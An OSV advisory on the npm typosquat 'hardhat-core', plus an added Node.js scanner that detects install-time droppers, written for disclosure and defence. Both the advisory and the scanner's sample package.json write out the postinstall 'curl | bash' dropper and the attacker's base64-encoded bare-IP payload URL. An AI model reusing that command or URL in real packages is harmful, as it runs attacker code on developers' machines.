{
  "id": "MAL-2026-3713",
  "summary": "Malicious code in hardhat-core (npm)",
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (bb86c79e7ed3cd429c0f28bc08e00ce020df2ec42fdda086ad8bfca99f259930)\npackage.json declares a postinstall script that base64-decodes the string 'aHR0cDovLzguMjE3Ljc1LjE0NzozMDAwL3BheWxvYWQ=' to the URL http://8.217.75.147:3000/payload and pipes the response into bash via `curl -s \u003curl\u003e | bash`. This fires automatically during `npm install`, executing attacker-controlled shell code fetched over plain HTTP from a hardcoded bare IP with no integrity verification. The package itself is empty (index.js exports `{}`) and its name impersonates the widely-used `hardhat` Ethereum tooling — the only purpose of installing it is to trigger the dropper. Three independent block signals are present: install-time curl|bash to a non-publisher bare IP, base64-obfuscated URL inside a lifecycle script, and a typosquat name with no real functionality serving as the lure.\n\n## Source: ossf-package-analysis (37a9993551389729247a4d3b88747296e12dc861db457d83581f0e60cd4d0c30)\nThe OpenSSF Package Analysis project identified 'hardhat-core' @ 1.0.0 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package executes one or more commands associated with malicious behavior.\n",
  "modified": "2026-05-15T07:50:30.529002Z",
  "published": "2026-05-13T12:01:29Z",
  "database_specific": {
    "malicious-packages-origins": [
      {
        "sha256": "37a9993551389729247a4d3b88747296e12dc861db457d83581f0e60cd4d0c30",
        "source": "ossf-package-analysis",
        "modified_time": "2026-05-13T12:01:29Z",
        "versions": ["1.0.0"],
        "import_time": "2026-05-13T21:58:23.764687477Z"
      },
      {
        "id": "IN-MAL-2026-002819",
        "source": "amazon-inspector",
        "modified_time": "2026-05-15T03:21:38Z",
        "versions": ["1.0.0"],
        "sha256": "bb86c79e7ed3cd429c0f28bc08e00ce020df2ec42fdda086ad8bfca99f259930",
        "import_time": "2026-05-15T07:37:20.952322779Z"
      },
      {
        "id": "IN-MAL-2026-002736",
        "source": "amazon-inspector",
        "modified_time": "2026-05-14T19:25:34Z",
        "versions": ["1.0.0"],
        "sha256": "fab375c953441e530540f01ba02981bb29edb746fdecc608249c7bc314ca39a3",
        "import_time": "2026-05-15T07:37:18.7260115Z"
      }
    ]
  },
  "references": [
    {"type": "PACKAGE", "url": "https://www.npmjs.com/package/hardhat-core/v/1.0.0"}
  ],
  "affected": [
    {
      "package": {"name": "hardhat-core", "ecosystem": "npm", "purl": "pkg:npm/hardhat-core"},
      "versions": ["1.0.0"],
      "database_specific": {
        "cwes": [
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"},
          {"description": "The product contains code that appears to be malicious in nature.", "cweId": "CWE-506", "name": "Embedded Malicious Code"}
        ],
        "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hardhat-core/MAL-2026-3713.json",
        "indicators": {
          "package_integrity": [
            {"filename": "hardhat-core-1.0.0.tgz", "hashes": {"sha1": "7c766e1037afdf633f137c0688cff9e75dd22aae", "sha512_sri": "sha512-jxPOG6m+gbRmsfDHuNq0cOwFIRcPFTqpUA0tEe1GjiiLBjpPYXMN/ge+KumOhXZTg380FrkWYG1h7Fa5F+gM2g=="}}
          ],
          "evidence_files": [
            {"sha256": "ad71655f86483901c57b0116c7b3369d6e47b63b0ef327961b5547e7fb405fc0", "path": "package.json", "tlsh": "d4f0ab64af106af328c04e530a1b49cb64b3ca1f08287c68b39ba45d039c7eb15fb55e"},
            {"sha256": "8c392403f10df44e70244d14aa135cb572886ab4fb693af581c580207d943ae7", "path": "index.js", "tlsh": "bc900205816571811315c657a74960831bd4c394c55040a04744495d4016e4450b65d0"}
          ]
        }
      }
    }
  ],
  "schema_version": "1.7.5",
  "credits": [
    {"name": "Amazon Inspector", "contact": ["actran@amazon.com"], "type": "FINDER"},
    {"name": "OpenSSF: Package Analysis", "contact": ["https://github.com/ossf/package-analysis", "https://openssf.slack.com/channels/package_analysis"], "type": "FINDER"}
  ]
}
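The amazon-inspector details above name three block signals: an install-time lifecycle script that pipes a download into a shell, a base64-obfuscated URL inside that script, and a typosquat name on a package that ships no code. The following Node script is an added example, not part of the OSV record or of any project, that checks a package for exactly those signals. It decodes base64-looking tokens in install hooks before judging the script, so the bare-IP URL is found even though it never appears in clear text. The sample package.json and index.js are constructed from the advisory's description (the real package's exact script text is not reproduced), and the short list of popular names used for the lure check is an assumption.

```javascript
// Added example (not part of the OSV record or of any project): a static
// check for the install-time dropper pattern this advisory describes.
// Input is package.json text plus the package's entry file; the sample
// below is constructed from the advisory's details, not the real tarball.

const INSTALL_HOOKS = new Set(['preinstall', 'install', 'postinstall', 'prepare']);
// A download command whose pipeline ends in a shell interpreter.
const PIPE_TO_SHELL = /\b(?:curl|wget)\b.*\|\s*(?:ba|z|da)?sh\b/;
// A URL whose host is a bare IPv4 address; group 1 is the scheme, group 2 the host.
const BARE_IP_URL = /(https?):\/\/(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(?:\/\S*)?/;
// Runs of the base64 alphabet long enough to hide a URL or a command.
const B64_TOKEN = /[A-Za-z0-9+/]{16,}={0,2}/g;
// Assumption: a small list of popular names that lure packages borrow.
const POPULAR_NAMES = ['hardhat', 'express', 'lodash', 'react'];

// Decode every base64-looking token in a script and keep the ones that
// turn into something actionable (a URL or a shell/download command).
function decodeHidden(script) {
  const hits = [];
  for (const token of script.match(B64_TOKEN) || []) {
    const text = Buffer.from(token, 'base64').toString('utf8');
    const printable = /^[\x20-\x7e]+$/.test(text);
    if (printable && /https?:\/\/|\b(?:curl|wget|sh|bash)\b/.test(text)) {
      hits.push({ token, decoded: text });
    }
  }
  return hits;
}

// Returns { block, findings }: block is true when any install hook trips a
// signal on its own; the lure check only corroborates.
function scanPackage(packageJsonText, indexJsText) {
  const pkg = JSON.parse(packageJsonText);
  const name = pkg.name || '';
  const findings = [];
  let installHookHits = 0;

  for (const [hook, script] of Object.entries(pkg.scripts || {})) {
    if (!INSTALL_HOOKS.has(hook)) continue;
    const hidden = decodeHidden(script);
    // Judge the script together with anything it would decode at run time.
    const effective = [script, ...hidden.map((h) => h.decoded)].join('\n');
    if (PIPE_TO_SHELL.test(effective)) {
      findings.push(`${hook}: pipes a download straight into a shell`);
      installHookHits++;
    }
    const m = effective.match(BARE_IP_URL);
    if (m) {
      findings.push(`${hook}: fetches ${m[0]} from bare IP ${m[2]} over ${m[1]}`);
      installHookHits++;
    }
    for (const h of hidden) {
      findings.push(`${hook}: base64-obfuscated '${h.decoded}'`);
      installHookHits++;
    }
  }

  // Lure check: the name borrows a popular package's name and ships no code.
  const borrowed = POPULAR_NAMES.find(
    (p) => name !== p && (name.startsWith(`${p}-`) || name.endsWith(`-${p}`)),
  );
  const emptyModule = /^\s*module\.exports\s*=\s*\{\s*\}\s*;?\s*$/.test(indexJsText);
  if (borrowed && emptyModule) {
    findings.push(`name '${name}' resembles '${borrowed}' but index.js exports an empty object`);
  }

  return { block: installHookHits > 0, findings };
}

// Constructed sample in the shape the advisory describes.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'hardhat-core',
  version: '1.0.0',
  main: 'index.js',
  scripts: {
    postinstall:
      'curl -s $(echo aHR0cDovLzguMjE3Ljc1LjE0NzozMDAwL3BheWxvYWQ= | base64 -d) | bash',
  },
});
const SAMPLE_INDEX_JS = 'module.exports = {};\n';

console.log(JSON.stringify(scanPackage(SAMPLE_PACKAGE_JSON, SAMPLE_INDEX_JS), null, 2));
```

Running the script on the constructed sample reports all three signals and a block verdict. The same logic applied to a package with an ordinary `postinstall` such as `node scripts/build.js` returns no findings, which is the false-positive case a practitioner should check before wiring a scanner like this into CI. The scanner does not replace `npm install --ignore-scripts` in build pipelines; it is a triage aid for the packages that are allowed to run lifecycle scripts.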